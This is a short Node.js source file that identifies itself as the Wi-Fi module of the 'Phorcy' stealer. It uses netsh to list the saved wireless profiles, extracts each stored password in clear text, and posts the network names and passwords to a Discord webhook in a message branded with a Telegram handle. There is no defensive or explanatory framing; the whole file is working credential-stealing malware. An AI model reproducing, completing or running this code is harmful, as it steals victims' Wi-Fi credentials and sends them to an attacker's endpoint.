/// coded by syntheticuhh
/// WIFI-DATA FOR PHORCY STEALER

const util = require('util');
const exec = util.promisify(require('child_process').exec);
const axios = require('axios');
///const config = {
///  webhook: "https://discord.com/api/webhooks/xxxxx/xxxxxxx"
///};
async function getwifinames() {
  const { stdout } = await exec('netsh wlan show profiles');
  return stdout.split('\n')
    .filter(line => line.includes('All User Profile'))
    .map(line => line.split(':')[1].trim());
}
async function getwifipass(wifinames) {
  const wificreds = [];
  for (const wifiname of wifinames) {
    const { stdout } = await exec(`netsh wlan show profile name="${wifiname}" key=clear`);
    const passwordL = stdout.split('\n').find(line => line.includes('Key Content'));
    if (passwordL) {
      const password = passwordL.split(':')[1].trim();
      wificreds.push({ wifiname, password });
    }
  }
  return wificreds;
}
async function getwificreds() {
  const names = await getwifinames();
  return await getwifipass(names);
}
async function embedsave(data) {
  const wifiembed = {
    title: "T.me/Phorcy ~ WIFI-DATA",
    color: 0x00008B,
    description: "```plaintext\n" +
      ` =============================================================\n` +
      `${data.map(entry => `| User: ${entry.wifiname} ////// Wifi Password: ${entry.password}\n`).join('')}` +
      ` =============================================================\n` +
      "```"
  };
  await axios.post(config.webhook, { embeds: [wifiembed] });
}
async function getdadata() {
  const wificreds = await getwificreds();
  await embedsave(wificreds);
  console.log('sent');
}
getdadata();
